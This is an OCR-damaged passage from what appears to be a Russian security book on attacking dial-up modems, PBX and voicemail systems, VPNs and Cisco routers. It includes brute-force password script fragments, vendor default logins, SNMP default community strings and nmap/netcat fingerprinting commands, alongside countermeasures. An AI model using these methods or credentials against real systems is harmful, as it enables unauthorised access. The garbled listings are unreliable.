использования бесплатных программ телефонного сканирования было уделено достаточно много внимания. Рассказ о PhoneSweep будет значительно короче, поскольку практически все понятно из самого интерфейса пользователя (рис. 9.4).
Помимо выявления стандартных модемов, утилита PhoneSweep позволяет реализовывать типичные атаки против них. В текстовом файле bruteforce.txt, расположенном в каталоге приложения, содержится перечень имен пользователей и паролей, которые передаются в ответ на приглашение модема. Если соединение разрывается, утилита PhoneSweep снова набирает номер и пробует воспользоваться следующим вариантом отклика, пока не будет исчерпан весь список (используя эту утилиту для тестирования защищенности своего сервера удаленного доступа, остерегайтесь возможности блокирования учетной записи). Одно только это средство стоит денег, затраченных на покупку PhoneSweep, поскольку позволяет автоматизировать операции. которые обычно выполняются вручную (см. следующий раздел).
Интересные результаты сравнения программ PhoneSweep и THC-Scan, полученные, из заинтересованного источника — от компании Sandstorm Enterprises, Inc., можно найти по адресу http: //geek-girl. com/bugtraq/1998_4/0770 .html. Способы проникновения в систему через модем Сканирование телефонных номеров преследует цель выявить потенциальные точки для последующего вторжения в систему через модемное соединение, однако чаще всего для определения степени уязвимости удаленного соединения требуется внимательный анализ отчетов. Например, из следующего фрагмента файла CARRIERS . LOG, сгенерированного утилитой THC-Scan, видны типичные отклики модемов. Для краткости этот файл несколько подредактирован. Подобные данные содержатся и в приложении А отчета утилиты PhoneSweep. 23-05-1997 14:57:50 Dialing... 95552851 Авторы умышленно выбрали эти примеры, чтобы показать неоценимое значение опыта работы с различными серверами удаленных соединений и операционными системами. Например, первый отклик, похоже, поступил от системы HP (HP995-40C), однако последующая строка с информацией о команде HELLO выглядит странновато. При установке соединения с этой системой вручную с помощью стандартного программного обеспечения (авторы книги предпочитают программу Procomm Plus, распространяемую компанией Symantec Corp, и представленную по адресу http://www.Symantec, соm/рrосоrоm/procomm.html, поскольку с ее помощью можно эмулировать терминал VT-100 на основе протокола ASCII) пользователя ожидает столь же непонятный результат. Для прояснения ситуации взломщик должен быть знаком с системами МРЕ-XL от Hewlett-Packard и знать, что в ответ на приглашение нужно ввести команду HELLO имя. ПОЛЬЗ, а затем пароль. Поэтому имеет смысл воспользоваться утилитой Procomm Plus и ввести следующую информацию. CONNECT 57600 В качестве имени пользователя и пароля в HP-системах по умолчанию применяются FIELD. SUPPORT и TeleSup соответственно. Таким образом, при наличии богатого опыта и затрате минимальных усилий можно выявить бреши в таких местах, где неподготовленные пользователи обнаружат лишь непробиваемую стену. Доморощенный способ: примитивное написание сценариев После получения результатов сканирования телефонных номеров нужно систематизировать их в так называемые домены (domain). Как уже отмечалось, неоценимую помощь в этом окажет опыт работы с различными типами серверов удаленных соединений и операционных систем. Выбор системы для последующего проникновения зависит от множества факторов, в том числе от того, сколько времени хакер готов посвятить своим экспериментам, какая полоса пропускания имеется в его распоряжении, а также от его интуиции и профессионализма в написании сценариев.
Получив эту информацию, можно приступать к систематизации соединений в так называемые домены для проникновения по телефонным линиям. Для иллюстрации рассмотрим четыре категории соединений или домена для дальнейшего проникновения. При этом сразу же исключим из рассмотрения так называемый домен ЛДП (легко доступный плод). Остальные домены основаны на различных механизмах аутентификации и ограничении числа попыток доступа к этим механизмам. В целом домены можно классифицировать следующим образом.
В целом чем ниже в списке находится домен, тем сложнее проникнуть в относящуюся к нему систему, и тем более сложные сценарии требуется для этого применять. Рассмотрим эти домены подробнее. Легко доступный плод Для проникновения в систему, относящуюся к этому домену, требуется минимум усилий. Если хакер удачлив — его неминуемо ждет успех. Для проникновения в систему не требуется писать никаких сценариев — нужно лишь угадать идентификатор пользователя или пароль. В книге нельзя перечислить все типичные идентификаторы и пароли. Угадать эту информацию поможет опыт и интуиция. Хорошей отправной точкой в этом процессе может послужить идентификация подписи. В табл. 10.3 следующей главы приводится полезный список, с которого можно начать дальнейшие исследования. Однако каким бы списком ни воспользовался читатель, главное — быстро проверить все применяемые по умолчанию варианты и в случае неудачи перейти к следующему типу домена. Одинарная идентификация, неофаниченное число попыток Это первый серьезный домен (ЛДП не в счет), который зачастую труднее всего идентифицировать. Дело в том, что многие системы, которые, на первый взгляд, принадлежат этому домену (листинг 9.1 А), после ввода корректного идентификатора требуют повторной аутентификации (листинг 9.1 Б). Пример системы, действительно относящейся к этой категории, приводится в листинге 9.2. Эта система использует один механизм аутентификации и допускает неограниченное число попыток установки соединения. XX-Jul-XX 09:51:08 91ХХХ5551234 Листинг 9.1 Б. Пример изменения поведения системы после ввода корректного идентификатора пользователя или пароля XX-Jul-XX 09:55:08 91ХХХ5551234 В следующем примере система действительно относится к первому домену, поскольку для получения доступа к ней требуется только ввести пароль. Заметим также, что эта система допускает неограниченное число попыток установки соединения. Для проникновения в такую систему нужно запустить сценарий подбора пароля. XX-Jul-XX 03:45:08 91ХХХ5551235 Для проникновения в систему, представленную в этом примере, нужно написать сценарий, который выполнялся бы простыми утилитами DOS. Приведенный ниже фрагмент — это не сложная программа, а простой пример сценария, повторяющего попытки регистрации до тех пор, пока не будет исчерпан его словарь. Как уже отмечалось, при написании сценариев для модемных соединений чаще всего применяется программа Procomm Plus со встроенным языком сценариев ASPECT. Система Procomm Plus известна уже в течение многих лет и хорошо зарекомендовала себя при тестировании как на ранних версиях DOS, так и на новейших версиях 32-разрядных операционных систем. Следует отметить также прекрасную справочную систему и документацию по языку ASPECT. OPEN "5551235.was" FOR OUTPUT AS #2 Файл словаря может содержать любое количество типичных паролей, например: apple и т.д. Поскольку сценарий предназначен для подбора паролей, перед началом его выполнения нужно открыть файл журнала регистрации событий. Тогда весь процесс работы сценария будет фиксироваться в файле. Позднее содержимое файла журнала можно проанализировать и определить правильный пароль. На первый взгляд, может показаться, что журнал регистрации вовсе не нужен. Достаточно просто выполнять сценарий до успешной попытки (получения корректного пароля). Однако это невозможно, поскольку заранее нельзя определить, что произойдет после ввода корректного пароля, т.е. нельзя сформулировать условие успешной попытки. Если же известно, к какому результату должен привести ввод корректного пароля, то в файле сценария на языке ASPECT можно использовать условие WAITFOR и задать соответствующее условие. При таком подходе остается меньше шансов для случайностей. Авторы являются сторонниками журналов регистрации. Хотя такие журналы сложно анализировать — их легко создавать. При этом, конечно, предполагается, что дополнительные сведения о соединении отсутствуют. Те, кто работал консультантом по безопасности или аудитором и сотрудничал с людьми, знающими характеристики удаленных соединений своих организаций, могут использовать совсем другие подходы. Следует упомянуть еще о некоторых особенностях работы сценариев. Наличие шума на линии между ожидаемыми символами может свести на нет всю работу сценария. Поэтому, прежде чем запускать сценарий в действие, желательно несколько раз протестировать его на небольших словарях из 10-20 паролей и удостовериться в его работоспособности. Одинарная идентификация, ограниченное число попыток Для проникновения в систему, относящуюся ко второму типу доменов, требуется несколько больше времени, поскольку в сценарий нужно добавить новые элементы. Пример работы такой системы приведен в листинге 9.3. Несложно заметить небольшие отличия в поведении этой и рассмотренной выше системы первого типа. В данном примере после третьей попытки установки соединения появляется сообщение АТНО. Это типичная последовательность символов, означающая разрыв соединения для модемов Hayes. Значит, данное соединение разрывается после трех неудачных попыток аутентификации. Число попыток может варьироваться, однако в этом примере будет показано, как восстановить соединение при его разрыве после X (в данном примере 3-х) неудачных попыток. Для этого нужно добавить небольшой фрагмент кода в рассмотренный выше сценарий. Такой пример содержится в листинге 9.4. Здесь предпринимается три попытки угадать пароль, а затем соединение устанавливается снова и процесс повторяется. XX-Jul-XX 03:45:08 91ХХХ5551235 С:CONNECT 9600/ARQ/V32/LAPM (Отметим важную характеристику — последовательность АТНО, свидетельствующую о разрыве соединения модема Hayes.) OPEN "5551235.was" FOR OUTPUT AS #2
Двойная идентификация, неограниченное число попыток К третьему типу доменов зачастую относятся системы, которые, на первый взгляд, можно принять за системы первого домена. Однако для проникновения в систему третьего домена нужно угадать не только идентификатор пользователя, но и пароль. Поэтому проникновение в такую систему занимает больше времени, чем в системы из рассмотренных выше доменов. Сценарий проникновения в такую систему обычно более сложен, поскольку требует передачи не одной, а двух корректных строк. При этом возможно гораздо больше ошибок. Такой сценарий напоминает рассмотренные выше примеры. Пример поведения системы, относящейся к третьему домену, приведен в листинге 9.5, а программа на языке QBASIC для создания сценария ASPECT — в листинге 9.6. XX-Jcl-XX 09:55:08 91ХХХ5551234 Листинг 9.6. Пример программы на языке QBASIC (файл 5551235.ВАS) OPEN "5551235.was" FOR OUTPUT AS #2
Двойная идентификация, ограниченное число попыток Четвертый домен является развитием третьего. Доя проникновения в систему четвертого домена требуется угадать имя пользователя и пароль при ограниченном числе попыток. После неудачного использования заданного числа попыток требуется восстановить разорванное соединение. Рассмотрим пример работы системы и программу генерации соответствующего сценария. В следующем листинге содержатся результаты атаки целевой системы. XX-Jul-XX 09:55:08 91ХХХ5551234 А вот пример QBASIC-программы, генерирующей сценарий на языке ASPECT. OPEN "5551235.was" FOR OUTPUT AS #2 |
Заключительные замечания Рассмотренные выше примеры относятся к реально существующим изученным авторами системам. Читатели могут встретиться с системами, требующими реализации в сценарии некоторых других особенностей. Разработка сценария для конкретной ситуации — это путь проб и ошибок. Для написания сценариев можно использовать и другие языки, однако этот метод был выбран для простоты. Напомним еще раз, что для реализации этого подхода сначала необходимо открыть файл журнала, поскольку после успешного написания сценария и его многочасовой работы будет очень обидно обнаружить полное отсутствие результатов. Защита удаленных соединений Не мудрствуя лукаво, приведем список вопросов, которые необходимо решить в процессе планирования защиты удаленных соединений своей организации. Этот список упорядочен по сложности реализации мероприятий (от простого к сложному). Поэтому в первую очередь будут устранены проблемы, относящиеся к домену ЛДП. Внимательному читателю этот список наверняка напомнит перечень мероприятий в рамках политики защиты удаленных соединений. Хакинг удаленных внутренних телефонных сетей РВХ На сегодняшний день по-прежнему существуют удаленные соединения с внутренними офисными телефонными сетями РВХ. На самом деле управление такими сетями чаще всего реализуется именно посредством удаленных соединений. Аппаратная консоль для доступа в сеть РВХ в настоящее время превратилась в сложную машину, доступ к которой обеспечивается через IP-сети и интерфейс клиента. При этом многие удаленные соединения с хорошо настроенными сетями РВХ были упущены из виду. Кроме того, поставщики систем РВХ зачастую требуют от своих клиентов установки удаленного доступа к РВХ для обеспечения удаленной поддержки. И хотя это требование не лишено смысла, многие компании относятся к нему очень упрощенно и просто оставляют модем постоянно включенным и подключенным к внутренней телефонной сети. На самом же деле нужно поступать следующим образом. При возникновении проблемы представитель компании должен позвонить в службу поддержки и при необходимости установить удаленное соединение с сетью РВХ, дать возможность службе поддержки устранить проблемы по удаленной связи, а затем срезу же отключить соединение. Поскольку многие компании оставляют соединения с сетями РВХ постоянно открытыми, это открывает широкие возможности для несанкционированного проникновения в систему путем сканирования телефонных номеров. Таким образом, хакинг соединений с сетями РВХ имеет ту же природу, что и взлом обычных удаленных соединений. Доступ к телефонной сети от компании Octel В телефонных сетях РВХ от компании Octel пароль администратора обязательно является числом. Иногда это играет очень важную роль. По умолчанию почтовый ящик системного администратора во многих системах компании Octel — 9999. XX-Feb-XX 05:03:56 *91ХХХ5551234 С: CONNECT 9600/ARQ/V32/LAPM Как видно из приведенного фрагмента интерфейса, для входа в сеть РВХ достаточно ввести либо числовой пароль, либо номер почтового ящика системного администратора. Система РВХ от компании Williams Как правило, работа в системе РВХ компании Williams происходит так, как показано ниже. При регистрации в сети зачастую требуется ввести номер пользователя. Обычно это пользователь первого уровня, номер которого — четырехзначное число. Очевидно, что подобрать нужное четырехзначное число не составляет труда. XX-Feb-XX 04:03:56 *91ХХХ5551234 С:
Система Meridian На первый взгляд, система Meridian напоминает операционную систему UNIX. Однако воздержитесь от ее покупки! При вводе идентификатора пользователя maint с таким же паролем обеспечивается доступ к управляющей консоли. Тот же результат достигается при вводе идентификатора пользователя mluser с одноименным паролем Это две различные оболочки в стиле UNIX, предназначенные для ограничения взаимодействия с системой РВХ. Однако эти ограничения очень легко обойти. XX-Feb-XX 02:04:56 *91ХХХ5551234
Система ROLM PhoneMail Приведенное ниже поведение свойственно устаревшей системе ROLM PhoneMail. При входе в нее иногда даже отображаются соответствующие идентификационные маркеры. XX-Feb-XX 02:04:56 *91ХХХ5551234 С: CONNECT 9600/ARQ/V32/LAPM Вот идентификаторы пользователей и пароли, используемые в системе ROLM PhoneMail по умолчанию. LOGIN: sysadrain PASSWORD: sysadmin
Система ATT Definity 75 Система ATT Definity 75 — одна из старейших систем РВХ, и ее приглашение выглядит как стандартное приглашение UNIX. Иногда при этом выводятся даже соответствующие идентификационные маркеры. ATT UNIX S75 Приведем список используемых по умолчанию учетных записей и паролей для системы ATT Definity 75. По умолчанию для этой системы устанавливается большое количество готовых к работе учетных записей и паролей. Обычно эти учетные записи впоследствии модифицируются их владельцами либо по собственному желанию, либо после проведения аудита безопасности системы. Однако после модификации системы предлагаемые по умолчанию учетные записи могут снова быть восстановлены. Иными словами, измененные в исходной версии системы данные могут снова принять предлагаемые по умолчанию значения после одной или нескольких модернизаций системы. Вот список используемых по умолчанию в системе ATT Definity 75 имен и паролей. Login: enquiry Password: enquirypw
Защита сети РВХ средствами АСЕ-сервера Если вам встретится система, приглашение которой имеет следующий вид, — не стоит ломать копья: вероятнее всего, такую систему не удастся взломать, поскольку она защищена надежным механизмом на базе протокола АСЕ-сервера. XX-Feb-XX 02:04:56 *91ХХХ5551234 С: CONNECT 9600/ARQ/V32/LAPM
Контрмеры против взлома систем РВХ Как и при защите удаленных соединений, необходимо максимально ограничить время работы модемов, применять сложные формы аутентификации (по возможности двойную аутентификацию), а также предусмотреть возможность отключения после нескольких неудачных попыток установки соединения. Прямой взлом систем голосовой почты В начале 90-х годов появились две программы, предназначенные для взлома систем голосовой почты: Voicemail Box Hacker 3.0 и VrACK 0.51. Авторы этой книги пробовали пользоваться ими, но оказалось, что эти программы подходят для взлома более ранних и менее защищенных систем голосовой почты. Программа Voicemail Box Hacker 3.0 предназначена только для работы с системами, использующими четырехзначные пароли. Программа VrACK 0.51 обладает некоторыми интересными возможностями, однако для нее сложно писать сценарии и, вообще, она рассчитана на старые архитектуры компьютеров на базе процессоров х86, а на современных компьютерах работает нестабильно. Возможно, упомянутые программы в настоящее время не поддерживаются потому, что попытки взлома систем голосовой почты предпринимаются нечасто. Таким образом, для взлома систем голосовой почты лучше всего использовать язык сценариев ASPECT. proc main Число вариантов паролей голосовой почты всегда конечно. Конкретное количество возможных паролей зависит от максимально допустимой длины пароля. Чем длиннее пароль, тем больше времени может потребовать его взлом. При этом следует иметь в виду, что за процессом взлома требуется постоянно следить и слушать ответы системы голосовой почты. Однако умный взломщик может записать весь процесс взлома на магнитофон, тогда постоянное его присутствие при работе сценария не потребуется. Независимо от того, когда прослушиваются результаты работы сценария (сразу же или потом), большинство попыток ввода пароля окажутся безуспешными. Успешная попытка должна завершиться сообщением типа "В вашем почтовом ящике имеется X новых сообщений...". Заранее нельзя точно угадать, каким будет это сообщение. Количество возможных попыток находится в экспоненциальной зависимости от длины пароля. Поэтому для ускорения процедуры взлома можно использовать некоторые эмпирические закономерности. Таблица 9.1. Типичные пароли системы Voicemail
И наконец, этот способ подбора паролей можно автоматизировать. Если "захватывать" аналоговый голосовой сигнал с помощью некоторого цифрового преобразователя сигналов или научиться записывать ответы системы, то можно прослушать результаты работы сценария в автономном режиме и не присутствовать при его реализации. Контрмеры против взлома систем голосовой почты Для защиты системы голосовой почты нужно принять строгие меры безопасности. Например, включите режим блокировки соединений после заданного числа неудачных попыток. Тогда взломщик не сможет за один сеанс проверить более пяти или семи паролей. Хакинг виртуальных частных сетей Телефонные сети являются достаточно надежными и разветвленными, поэтому удаленные соединения еще долго не выйдут из обращения. Тем не менее, им на смену уже приходят новые механизмы удаленного доступа — виртуальные частные сети VPN (Virtual Private Network).
Взлом протокола РРТР, реализованного компанией Microsoft Анализ протокола РРТР в реализации компании Microsoft был выполнен 1 июня 1998 года известным криптоаналитиком Брюсом Шнеером (Bruce Schneier) и знаменитым хакером Питером Маджем (Peter Mudge) (http://www.counterpane.com/pptp. html). Технический обзор результатов этого анализа, представленный Алефом Ваном (Aleph One) для журнала Phrack Magazine. В своем обзоре Алеф Ван вскрыл новые бреши в защите протокола РРТР, в том числе возможности обмана РРТР-сервера с целью получения данных аутентификации. Информацию об устранении недостатков в реализации протокола РРТР от компании Microsoft можно найти по адресу http://www.counterpane.com/ pptpv2-paper.html.
Устранение недостатков протокол а РРТР Означает ли все это, что над технологией виртуальных частных сетей разверзлись небеса? Абсолютно нет. Повторим еще раз, что все перечисленные недостатки касаются лишь конкретной реализации протокола компании Microsoft. Все они были устранены в сервисном пакете Service Pack 4 для серверов и клиентов. Более подробная информация об устраненных недостатках содержится в бюллетене Microsoft Security Bulletin MS98-012. Кроме того, в реализации для Windows 2000 протокол РРТР был существенно доработан. Теперь существует возможность использования протокола L2TP, основанного на IPSec. Для совместимости с новыми средствами обеспечения безопасности со стороны серверов РРТР-клиенты, работающие под управлением Win 9x, необходимо модернизировать с помощью Dial-Up Networking версии 1.3. Компания Microsoft подготовила подробный документ, касающийся протокола РРТР и защиты виртуальных частных сетей, который можно найти по адресу http://www.microsoft.com/ntserver/zipdocs/vpnsecur.exe). В ответ на предпринятые компанией Microsoft действия Шнеер и Мадж опубликовали новую статью, в которой одобрили результаты устранения большинства из описанных ранее недостатков. Однако авторы замечают, что протокол MS РРТР по-прежнему основывается на пользовательских паролях в целях обеспечения разнообразия ключей. Однако наиболее важный вывод из статьи Шнеера и Маджа читается между строк: существуют достаточно способные люди, которые хотят и могут испытать на прочность и взломать виртуальные частные сети, несмотря на все заявления об абсолютной защищенности последних. Кроме того, возможности реатазации стандартных атак против операционной системы, под управлением которой работает виртуальная частная сеть (например, проблема хэш-кодов LanMan), а также просто плохие проектные решения (неавторизованные каналы управления или повторное использование ключей сеансов) могут свести на нет все остальные преимущества этой безопасной, на первый взгляд, системы. |
Результаты анализа протокола IPSec Многие исследователи отмечают закрытость стандарта IPSec, встроенного в Windows 2000 компанией Microsoft. Однако такая закрытость имеет и свои преимущества. Поскольку никто толком не знает принципов работы протокола IPSec, то неизвестны и способы его взлома (устройства, работающие на базе протокола IPSec можно обнаружить путем прослушивания UDP-порта 500). Однако, как станет ясно из следующего раздела, завеса таинственности — не лучший фундамент для создания протокола безопасности. Результаты анализа, проведенного Шнеером (Schneier) и Фергюссоном (Ferguson) После покорения протокола РРТР Брюс Шнеер и его коллега Нельс Фергюссон (Niels Ferguson) из Counterpane Internet Security сконцентрировали свое внимание на протоколе IPSec и описали результаты своего анализа в специальной статье. Основной лейтмотив статьи Брюс Шнеера и Нельса Фергюссона сводится к тому, что и сам протокол IPSec, и соответствующие документы, описывающие его стандарт, потрясающе сложны. Это мнение человека, разработавшего алгоритм шифрования, претендующий на утверждение в качестве государственного стандарта США — AES (Advanced Encryption Algorithm).
Брюс Шнеер и Нельс Фергюссон завершают свою статью признанием полной капитуляции: "По нашему мнению, протокол IPSec слишком сложен, чтобы быть безопасным. Однако на сегодняшний день лучшего средства защиты не существует." Конечно же, пользователи протокола IPSec должны полагаться на авторов конкретной реализации этого стандарта. Каждой конкретной реализации могут быть присущи свои собственные достоинства и недостатки, которые не останутся незамеченными сообществом хакеров. Точка зрения Стивена М. Белловина (Steven M. Bellovin) Наблюдая за дискуссиями типа Cryptographic Challenges или изучая процедуры взлома RC5-64 , большинство читателей не отдают себе отчет в том, что обычно речь идет о получении взломщиками фрагментов незашифрованного текста. Однако захват передаваемой зашифрованной информации существенно отличается от взлома статических файлов паролей, поскольку поток зашифрованных данных не имеет четких границ, а значит, очень сложно определить начало и конец сеанса связи. Хакеру приходится угадывать, успешно расшифровывая и сопоставляя различные фрагменты разговора, не будучи при этом точно уверенным в правильном выборе исходной точки. Признанный титан мысли в области безопасности Internet, Стивен М. Белловин (Steven М. Bellovin) из лаборатории AT&T Labs Research опубликовал статью под названием Криптоанализ обычного текста с помощью протоколов IPSec ("Probable Plaintext Cryptanalysis of the IP Security Protocols"), в которой отмечает наличие известных фрагментов обычного текста в трафике IPSec — поля данных заголовка TCP/IP. И хотя это еще не свидетельствует о бреши в протоколе IPSec, этот факт дает пищу для размышления специалистам по взлому зашифрованных коммуникаций. |
Резюме Теперь многие читатели могут подвергнуть сомнению надежность общей концепции систем удаленного доступа, основанных как на технологии виртуальных частных сетей, так и на использовании старых добрых телефонных линий. И это правильно. Расширение пределов организаций до размеров тысяч (или миллионов) по определению надежных конечных пользователей — чрезвычайно рискованное дело, и авторы это доказали. Они предлагают исходить из предположения о том, что удаленные пользователи работают в наихудших с точки зрения безопасности условиях (обычно это достаточно близко к действительности). Вот некоторые советы по обеспечению безопасности удаленного доступа.
|
Глава 10. СЕТЕВЫЕ УСТРОЙСТВА
|
Сетевые устройства Компьютерная сеть — это кровеносная система любой компании. Сотни тысяч километров медных и оптоволоконных кабелей опоясывают стены корпоративной Америки, действуя подобно сосудам, доставляющим обогащенную кислородом кровь к мозгу. Однако во всем есть и другая сторона: типичную корпоративную локальную или глобальную сеть (LAN или WAN соответственно) трудно назвать безопасной. С учетом постоянно растущего значения компьютерных сетей сегодня нельзя пренебрежительно относится к этой проблеме, так как удачное проникновение злоумышленника в вашу сеть подчас может оказаться губительным для самого существования компании. В большинстве случаев овладение сетью означает то же самое, что и возможность перехвата почтовых сообщений, финансовых данных, перенаправление потока информации на неавторизованные системы. И все это возможно даже несмотря на применение частных виртуальных сетей (VPN — Virtual Private Network). |
Исследование Процесс обнаружения сетевого устройства не имеет принципиальных различий с описанными в данной книге методами обнаружения любых других компьютерных систем. Скорее всего взломщик начнет со сканирования портов, пытаясь найти какие-то "зацепки". Обнаружив открытые порты, он выполнит сбор маркеров и инвентаризацию сетевых ресурсов с помощью утилиты netcat. Если открыт порт UDP 161, скорее всего тут же последует попытка использования протокола SNMP (Simple Network Management Protocol), поскольку неправильно настроенные SNМР-устройства очень часто "выбалтывают" самую сокровенную информацию о своей конфигурации любому, кто ею заинтересуется. |
Обнаружение На этом этапе применяется сканирование портов с использованием разнообразных инструментов, о которых мы уже довольно подробно говорили в предыдущих главах. В большинстве случаев для выполнения всех работ будет вполне достаточно таких утилит, как traceroute, netcat и nmap. Прослеживание маршрута с помощью traceroute С помощью утилит traceroute или tracert, входящих в комплект поставки UNIX и NT, соответственно, можно определить основные маршруты, по которым проходят пакеты от вашего узла к другому узлу Internet или внутренней сети TCP/IP. Обладая этой информацией, можно обнаружить очень важный элемент сетевой инфраструктуры — маршрутизатор. Именно маршрутизатор чаше всего становится "мишенью № 1" в попытках злоумышленника обследовать структуру сети. Ниже приведен пример работы утилиты traceroute, из которого видно, как пакеты проходят от одного маршрутизатора (или брандмауэра) к другому. [sm@tsunami sm]$ traceroute www.destination.com Зная, что перед представляющим интерес узлом находится узел 192.168.0.1, можно предположить, что он представляет собой не что иное, как маршрутизатор, управляющий распределением пакетов по узлам сети. Именно поэтому на это устройство (равно как и на другие, попавшие в выявленный маршрут прохождения пакетов), злоумышленник обратит внимание в первую очередь. (Строго говоря, скорее всего, что объектом его внимания станет вся подсеть, в которую входит данное устройство.) Однако знание IP-адреса маршрутизатора не влечет за собой автоматического получения сведений об изъянах в его архитектуре и настройке. Для того чтобы получить такие сведения, необходимо прибегнуть к сканированию портов, определению операционной системы, а также сбору любой дополнительной информации, которая может дать ключ к взлому системы зашиты устройства. Контрмеры: защита от прослеживания маршрута Для того чтобы запретить маршрутизатору Cisco отвечать на запросы со значением TTL больше допустимого, воспользуйтесь следующей командой. access-list 101 permit icmp any 172.29.20.0 0.255.255.255 11 0
Сканирование портов С помощью утилиты nmар, к которой мы очень часто прибегаем в подобных ситуациях, из операционной системы Linux можно выяснить, какие порты маршрутизатора (192.168.0.1) находятся в состоянии ожидания запросов. По комбинации обнаруженных портов часто можно судить о типе маршрутизатора. В табл. 10.1 перечислены стандартные порты TCP и UDP, используемые на самых популярных сетевых устройствах. Для того чтобы идентифицировать тип устройств, можно прибегнуть к сканированию портов, а затем проанализировать полученные результаты. Не забывайте о том, что в различных реализациях комбинации портов могут отличаться от приведенных. Таблица 10.1. Стандартные TCP- и UDP-порты некоторых сетевых устройств
Так, если вас интересуют маршрутизаторы Cisco, выполните сканирование портов 1-25, 80, 512-515, 2001, 4001, 6001 и 9001. Полученные при этом результаты помогут определить изготовителя устройства и его тип. [/tmp]# nmap -pl-25,80,512-515,2001,4001,6001,9001 192.168.0.1 С помощью еще одного из наших любимых средств, утилиты SuperScan Робина Кейра (Robin Keir), сканирование можно выполнить из системы NT и найти все открытые порты маршрутизатора. Эта программа позволяет задать список портов, который впоследствии можно применять при каждой операции сканирования (рис. 10.1).
После выбора требуемого перечня портов можно приступать к сканированию сети (172 .16. 255. 0) на предмет поиска устройств Cisco. Полученная картина использования портов подталкивает к мысли о том. что в данном случае мы имеем дело с маршрутизатором Cisco. Конечно, пока этого нельзя сказать со всей определенностью, поскольку мы еще не установили тип используемой операционной системы. Для того чтобы подтвердить или опровергнуть наши предположения, необходимо провести предварительный сбор информации TCP, которую мы подробно рассматривали в главе 2. User Access Verification Идентификация операционной системы [root@source /tmp]# nmap -О -р!3 -n 192.168.0.1 Всегда, когда это возможно, для идентификации типа операционной системы сканируйте только один порт. Многие операционные системы, в том числе IOS компании Cisco и Solaris компании Sun, известны тем, что в качестве ответа возвращают отправителю пакеты, не соответствующие стандартам RFC, что может привести к зависанию отдельных систем. Для получения более подробной информации об исследовании стека читайте главу 2, "Сканирование".
Контрмеры: защита от идентификации типа ОС Методы обнаружения и предупреждения попыток сканирования с целью идентификации типа операционной системы подробно описаны в главе 2. Утечка информации в пакетах Cisco
Информация об этом изъяне системы зашиты Cisco впервые была опубликована в бюллетене Bugtraq Джоелом (JoeJ) из группы Rhino9. Он заключается в том, каким образом устройства Cisco отвечают на TCP-запросы SYN, передаваемые через порт 1999 (порт, используемый службой ident Cisco). Неофициальный ответ компании Cisco на эту проблему был опубликован в бюллетене Bugtraq Джоном Башински (John Bashinski) <jbash@cc.COM>. Контрмеры: защита маршрутизаторов Cisco от утечки информации Самый простой способ защиты от утечки информации заключается в том, чтобы использовать команду, запрещающую поступление пакетов TCP через порт 1999. Она может иметь следующую форму. access-list 101 deny tcp any any eq 1999 log!
Инвентаризация и сбор маркеров Cisco Если по всем признакам устройство ведет себя как устройство Cisco, то, скорее всего, так оно и есть. Однако в некоторых случаях данное утверждение все же оказывается ложным — лишь обнаружения ожидаемых открытых портов недостаточно, чтобы быть уверенным в том, что вы имеете дело именно с Cisco. Однако можно воспользоваться некоторыми дополнительными проверками, характерными именно для этой платформы. Служба finger и порты виртуальных терминалов 2001, 4001, 6001 На некоторые запросы служба finger компании Cisco может выдавать совершенно бесполезную (для пользователя или администратора, но не для злоумышленника) информацию. Виртуальные терминалы vty Cisco (обычно с номером 5) отвечают на простой запрос finger -1 @<узел>, но в выдаваемых результатах нет ничего информативного, за исключением лишь того, что по самому факту получения ответа можно судить о том, что мы имеем дело с маршрутизатором Cisco. User Access Verification Password: Password: Password: % Bad passwords Такое сообщение поможет злоумышленнику удостовериться в том, что он имеет дело с устройством Cisco. Служба XRemote Cisco (9001) Еще одним часто используемым портом Cisco является TCP-порт службы XRemote с номером 9001. Эта служба позволяет узлам вашей сети подключаться с помощью клиента XSession к маршрутизатору (обычно через модем). Когда злоумышленник подключается к этому порту с помощью утилиты netcat, то устройство, как правило, передает обратно идентификационный маркер, как показано в следующем примере. C:\>nc-nvv 172.29.11.254 9001
Контрмеры: защита от сбора информации об устройствах Cisco Единственный метод, позволяющий предотвратить инвентаризацию устройств Cisco. заключается в ограничении доступа с помощью списка ACL. Можно либо использовать установленное по умолчанию правило "очистки", либо в явной форме запретить подключение к соответствующим портам, чтобы все подобные попытки регистрировались в контрольном журнале. Для этого можно воспользоваться командами следующего вида. |
SNMP Протокол SNMP (Simple Network Management Protocol) предназначен для облегчения работы администратора по управлению устройствами сети. Однако огромной проблемой протокола SNMP версии 1 (SNMPvl) всегда была абсолютная незащищенность узла, на котором работали средства поддержки этого протокола. В исходной версии использовался только один механизм обеспечения безопасности, основанный на использовании специачьных паролей, называемых строками доступа (community string). В ответ на жалобы о наличии слабых мест в системе обеспечения безопасности была быстро разработана значительно улучшенная версия SNMP (SNMFV2). В этой версии для аутентификации сообщений, передаваемых между серверами и клиентами SNMP, используется алгоритм хэширования MD5. Это позволяет обеспечить как целостность пересылаемых данных, так и возможность проверки их подлинности. Кроме того, SNMPv2 допускает шифрование передаваемых данных. Это ограничивает возможности злоумышленников по прослушиванию трафика сети и получению строк доступа. Однако в то же время ничто не мешает администраторам использовать на маршрутизаторах простейшие пароли. Маршрутизаторы Ascend По умолчанию маршрутизаторы Ascend обеспечивают доступ по протоколу SNMP с помощью строк доступа public (для чтения — read) и writ: спя чтения и записи — read/write). Изъян в системе защиты, связанный с SNMP-доступом для чтения и записи, впервые был обнаружен специалистами из Network Associates. Inc. Контрмеры: защита маршрутизаторов Ascend Для того чтобы изменить установленные по умолчанию строки доступа на маршрутизаторе Ascend, просто воспользуйтесь командой меню Ethernet>ModConflg>SNMP Options. Маршрутизаторы Bay Маршрутизаторы компании Bay NT по умолчанию предоставляют доступ по протоколу SNMP, контролируемый на уровне пользователей как для чтения, так и для записи. Для того чтобы воспользоваться этой возможностью, достаточно попытаться использовать установленное по умолчанию пользовательское имя User без пароля. В командной строке маршрутизатора введите команду show snmp comm types Контрмеры: защита маршрутизаторов Bay В диспетчере Site Manager, который входит в состав программного обеспечения маршрутизаторов компании Bay Networks, выберите команду меню Protocols>IlP1* SNMPoCommunities. После этого выберите команду Community>Edit Community и измените строки доступа. Контрмеры: защита SNMP Если вы разрешаете осуществлять SNMP-доступ через пограничный брандмауэр к какому-либо одному устройству, а в использовании протокола SNMP для доступа к остальным узлам сети нет острой необходимости, то можно просто внести соответствующие ограничения в список ACL маршрутизатора. Если в строке доступа вы хотите использовать символ ?, то перед ним необходимо нажать комбинацию клавиш <Ctrl-V>. Например, для того чтобы установить строку доступа, равную secret? 2me, введите secret<Ctrl-V>?2me. В табл. 10.2 